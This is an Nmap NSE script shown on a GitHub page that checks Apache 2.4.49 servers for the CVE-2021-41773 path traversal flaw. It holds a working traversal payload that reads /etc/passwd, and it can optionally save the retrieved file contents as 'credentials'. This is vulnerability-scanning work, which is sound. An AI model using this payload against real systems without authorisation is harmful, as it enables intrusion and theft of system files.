-
Notifications
You must be signed in to change notification settings - Fork 50
/
http-vuln-cve-2021-41773.nse
110 lines (102 loc) · 4.65 KB
/
http-vuln-cve-2021-41773.nse
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
local http = require "http"
local stdnse = require "stdnse"
local shortport = require "shortport"
local table = require "table"
local string = require "string"
local vulns = require "vulns"
local nmap = require "nmap"
local io = require "io"
description = [[
This NSE script checks whether the target server is vulnerable to CVE-2021-41773
]]
---
-- @usage
-- nmap --script http-vuln-cve2021-41773 -p <port> <host>
-- nmap --script http-vuln-cve2021-41773 -p <port> <host> --script-args output='file.txt'
-- @output
-- PORT STATE SERVICE
-- 443/tcp open http
-- | CVE-2021-41773:
-- | Host is vulnerable to CVE-2021-41773
-- @changelog
-- 05-10-2021 - Discovery: Ash Daulton
-- 05-10-2021 - Author: Dhiraj Mishra (@RandomDhiraj) --[[ NMAP Script--]]
-- 05-10-2021 - Exploit Reference: --[[https://twitter.com/ptswarm/status/1445376079548624899--]]
-- @xmloutput
-- <table key="NMAP-1">
-- <elem key="title">Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49</elem>
-- <elem key="state">VULNERABLE</elem>
-- <table key="description">
-- <elem>A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
-- </table>
-- <table key="dates">
-- <table key="disclosure">
-- <elem key="year">2021</elem>
-- <elem key="day">05</elem>
-- <elem key="month">10</elem>
-- </table>
-- </table>
-- <elem key="disclosure">05-10-2021</elem>
-- <table key="extra_info">
-- </table>
-- <table key="refs">
-- <elem>https://httpd.apache.org/security/vulnerabilities_24.html</elem>
-- <elem>https://lists.apache.org/thread.html/r6abf5f2ba6f1aa8b1030f95367aaf17660c4e4c78cb2338aee18982f@%3Cusers.httpd.apache.org%3E</elem>
-- </table>
-- </table>
Discovery = "Ash Daulton"
author = "Dhiraj Mishra (@RandomDhiraj)" --[[ NMAP Script--]]
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"discovery", "intrusive","vuln"}
portrule = shortport.ssl
action = function(host,port)
local outputFile = stdnse.get_script_args(SCRIPT_NAME..".output") or nil
local vuln = {
title = 'Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49',
state = vulns.STATE.NOT_VULN,
description = [[
A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
]],
references = {
'https://httpd.apache.org/security/vulnerabilities_24.html',
'https://nvd.nist.gov/vuln/detail/CVE-2021-41773',
},
dates = {
disclosure = {year = '2021', month = '10', day = '05'},
},
}
local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
local path = "/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
local response
local output = {}
local success = "Host is vulnerable to CVE-2021-41773"
local fail = "Host is not vulnerable"
local match = 'root:x:0:0:root'
local credentials
local TMUI
response = http.get(host, port.number, path)
if not response.status then
stdnse.print_debug("Request Failed")
return
end
if response.status == 200 then
if string.match(response.body, match) then
stdnse.print_debug("%s: %s GET %s - 200 OK", SCRIPT_NAME,host.targetname or host.ip, path)
vuln.state = vulns.STATE.VULN
TMUI = (("Verify arbitrary file read: https://%s:%d%s"):format(host.targetname or host.ip,port.number, path))
if outputFile then
credentials = response.body:gsub('%W','.')
vuln.check_results = stdnse.format_output(true, TMUI)
vuln.extra_info = stdnse.format_output(true, "Credentials are being stored in the output file")
file = io.open(outputFile, "a")
file:write(credentials, "\n")
else
vuln.check_results = stdnse.format_output(true, TMUI)
end
end
elseif response.status == 403 then
stdnse.print_debug("%s: %s GET %s - %d", SCRIPT_NAME, host.targetname or host.ip, path, response.status)
vuln.state = vulns.STATE.NOT_VULN
end
return vuln_report:make_output(vuln)
end